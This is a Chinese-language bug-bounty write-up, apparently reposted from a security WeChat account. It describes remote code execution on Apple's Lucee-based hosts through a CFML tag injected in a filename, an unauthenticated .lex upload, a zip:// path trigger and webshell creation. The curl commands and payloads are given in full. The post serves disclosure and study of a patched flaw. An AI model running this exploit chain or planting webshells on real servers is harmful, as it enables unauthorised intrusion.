【技术分享】我是如何入侵Apple并拿到40万赏金的(二)

渗透技巧 2年前 (2022) admin
528 0 0

【技术分享】我是如何入侵Apple并拿到40万赏金的(二)

上一篇文章中讲述了我是如何从0开始针对Apple的资产进行网站探测、CMS识别、代码审计、失败的入侵过程再到WAF绕过的分析,本篇承接上篇,讲述RCE利链的完整过程。


01
facilities.apple.com上的远程代码执行

让我们先来看一下在 https://facilities.apple.com 上利用 imgProcess.cfmadmin.search.index.cfm触发的RCE链。

目前我们已经控制了一个目录,既可以向其中复制文件(dataDir参数),也可以指定一个目录来从其中复制文件过去(luceeArchiveZipPath参数)。

此时如果可以在服务器上的某处创建一个名称为:

server.<cffile action=write file=#Url['f']# output=#Url['content']#>.cfm

内容为:

"#stText.x.f#"

的文件,则可以通过luceeArchiveZipPath将其路径传递给admin.search.index.cfm

由于以下key:

server.<cffile action=write file=#Url['f']# output=#Url['content']#>.cfm

并不存在,那么将创建它并将其写入名为searchindex.cfm的文件中。

这意味着我们可以在使用dataDir参数来指定的任意目录中的searchindex.cfm文件中控制CFML标签(类似于PHP标签),这同时也意味着我们可以使用webroot路径在服务器上执行远程代码,达到RCE!

我们可以利用 imgProcess.cfm 在目标文件系统上创建一个文件:

server.<cffile action=write file=#Url['f']# output=#Url['content']#>.cfm

其内容与RegExp相匹配:

[''"##]stText..+?[''"##]

这次攻击测试并不会触发WAF,因为我们在这里没有进行路径遍历。

获得shell的完整利用链步骤

  • 首先创建一个文件名为server.<cffile action=write file=#Url['f']# output=#Url['content']#>.cfm,内容为 "#stText.x.f#"的文件(以匹配正则表达式),并将文件名进行URL编码,因为后端(tomcat)不支持某些字符

curl -X POST 'https://facilities.apple.com/lucee/admin/imgProcess.cfm?file=%2F%73%65%72%76%65%72%2e%3c%63%66%66%69%6c%65%20%61%63%74%69%6f%6e%3d%77%72%69%74%65%20%66%69%6c%65%3d%23%55%72%6c%5b%27%66%27%5d%23%20%6f%75%74%70%75%74%3d%23%55%72%6c%5b%27%63%6f%6e%74%65%6e%74%27%5d%23%3e%2e%63%66%6d' --data 'imgSrc="#stText.Buttons.save#"'

  • 访问触发复制文件名函数以准备将要执行的代码

curl 'http://facilities.apple.com/lucee/admin/admin.search.index.cfm?dataDir=/full/path/lucee/context/rootxharsh/&LUCEEARCHIVEZIPPATH=/full/path/lucee/temp/admin-ext-thumbnails/__/'

  • 写shell最终触发代码执行

curl https://facilities.apple.com/lucee/rootxharsh/searchindex.cfm?f=PoC.cfm&content=cfm_shell

  • 访问 webshell: https://facilities.apple.com/lucee/rootxharsh/PoC.cfm

  • 【技术分享】我是如何入侵Apple并拿到40万赏金的(二)

这次攻击测试并不会触发WAF,因为我们在这里没有进行路径遍历。


02
另辟蹊径,其他主机的沦陷

由于imgProcess.cfm在较早的Lucee版本中不可用,因此我们必须找到其他方法才能在另外两台主机上获得RCE。我们发现了另一种巧妙的方法;)。

绕过身份验证,上传.lex文件

经过审计发现,ext.applications.upload.cfm 文件的部分功能代码没有严格的身份验证。该代码段非常简单,我们只需要通过extfile表单传递带有文件扩展名.lex的form参数,如果不这么做,前面已经解释过,我们将会收到后端返回的异常。

<cfif not structKeyExists(form, "extfile") or form.extfile eq "">
...</cfif><!--- try to upload (.zip and .re) ---><cftry>
<cffile action="upload" filefield="extfile" destination="#GetTempDirectory()#"
nameconflict="makeunique" />

<cfif cffile.serverfileext neq "lex">
<cfthrow message="Only .lex is allowed as extension!" />
</cfif>
<cfcatch>
... </cfcatch></cftry><cfset zipfile="#rereplace(cffile.serverdirectory, '[/\]$', '')##server.separator.file##cffile.serverfile#"/>

针对.lex扩展名的处理,我们可以看到这段代码:

<cfif cffile.serverfileext eq "lex">
...
type="#request.adminType#"
...</cfif>

因为我们没有request.admintype,所以会触发异常。但是,但是,但是!!我们构造的恶意文件仍在触发之前就已经上传成功了,可以在这里确认:

【技术分享】我是如何入侵Apple并拿到40万赏金的(二)

.lex文件不过是一种压缩文件格式,这实际上是Lucee的一种扩展名的格式,我们可以上传,并且后端不会针对其检查文件内容,因此我们可以将该文件设置为任何我们想要的内容。


03
Exploit之光

通过对Lucee的审计和测试发掘 ,我们已经知道它允许使用诸如 zip://file:///等协议(我们刚好在此利用链中使用了这些协议),因此我们可以在系统中文件功能完全受到控制的地方利用这些被允许的协议来做一些我们想要的东西(luceeArchiveZipPath)。

现在,我们可以利用 ext.applications.upload.cfm 来创建.lex压缩文件,其中将包含一个名称为:

server.<cffile action=write file=#Url['f']# output=#Url['content']#>.cfm

内容为:

"#stText.x.f#"

的文件。一旦我们将该zip格式的压缩文件保存在系统上,就可以在luceeArchiveZipPath变量中使用zip://协议来访问 *.*.cfm文件。

获取另外两台主机的shell

  • 1、创建一个文件名为server.<cffile action=write file=#Url['f']# output=#Url['content']#>.cfm ,内容为"#stText.x.f#" 的文件,并将其压缩为payload.lex

  • 【技术分享】我是如何入侵Apple并拿到40万赏金的(二)

  • 2、利用未授权的上传点ext.applications.upload.cfm上传该 .lex 文件

curl -vv -F [email protected] https://booktravel.apple.com/lucee/admin/ext.applications.upload.cfm

  • 3、利用 zip:// 协议触发

curl https://booktravel.apple.com/lucee/admin/admin.search.index.cfm?dataDir=/full/path/lucee/web/context/exploit/&luceeArchiveZipPath=zip:///full/path/lucee/web/temp/payload.lex

  • 4、现在,我们的恶意文件
    server.<cffile action=write file=#Url['f']# output=#Url['content']#>.cfm
    已作为文本字符串添加到了 /<lucee web>/context/exploit/ 目录下的 searchindex.cfm文件里,
    我们可以通过以下方式访问它:

    https://booktravel.apple.com/<lucee root>/exploit/searchindex.cfm

    5向 https://booktravel.apple.com/lucee/exploit/searchindex.cfm?f=test.cfm&output=cfml_shell 发出请求将创建我们的 webshell

  • 创建成功,访问 webshell,并执行 id 命令:https://booktravel.apple.com/lucee/exploit/test.cfm?cmd=id

  • 【技术分享】我是如何入侵Apple并拿到40万赏金的(二)

由于有负载平衡,所以我们此处需要使用burp的Intruder功能来发现我们的shell命令执行结果。

Apple方面迅速解决了该问题,但要求我们在他们修复之前不要披露此漏洞。对于这些漏洞,总共给了我们50,000+美元的奖励。

另一方面,我们和Apple、Lucee的团队进行了交流。Lucee团队通过限制直接访问cfm文件来修复该错误。目前我们仍在等待CVE的分配下发。

【技术分享】我是如何入侵Apple并拿到40万赏金的(二)

- 结尾 -
精彩推荐
【技术分享】DiceCTF 2021 学习笔记
【技术分享】带你搞懂符号执行的前世今生与最近技术
【技术分享】从内核层面分析部分PHP函数

【技术分享】我是如何入侵Apple并拿到40万赏金的(二)
戳“阅读原文”查看更多内容

原文始发于微信公众号(安全客):【技术分享】我是如何入侵Apple并拿到40万赏金的(二)

版权声明:admin 发表于 2022年8月1日 上午10:01。
转载请注明:【技术分享】我是如何入侵Apple并拿到40万赏金的(二) | CTF导航

相关文章

暂无评论

您必须登录才能参与评论!
立即登录
暂无评论...